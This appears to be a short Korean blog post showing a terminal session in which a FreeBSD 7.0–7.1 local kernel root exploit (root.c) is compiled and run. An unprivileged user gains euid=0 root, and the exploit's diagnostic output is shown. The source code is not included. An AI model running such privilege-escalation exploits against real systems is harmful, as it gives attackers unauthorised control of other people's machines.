FreeBSD 7.0~7.1 에서 익스플로잇이….
$ ls
root.c
$ gcc -o root root.c
$ ls
root root.c
$ id
uid=1001(ruo91) gid=1001(ruo91) groups=1001(ruo91)
$ ./root
FreeBSD local kernel root exploit
by: christer/mu-b
http://www.bsdcitizen.org/ — BSDCITIZEN 2008!@$!
* allocated pointer page: 0x00000000 -> 0x08000000 [134217728-bytes]
* allocated itimer struct: 0x20000000 -> 0x200000DC [220-bytes]
* filling pointer page… done
* found posix_clocks @ [0xc0c45fe0]
* it_page->it_clockid: 0x0CBFC70D [access @0xBFBFECE8]
* ktimer_delete (0xD0000000)
* ktimer_delete: 0 1
$ id
uid=1001(ruo91) gid=1001(ruo91) euid=0(root) groups=1001(ruo91)
**FreeBSD7.0~7.1 Local kernel root exploit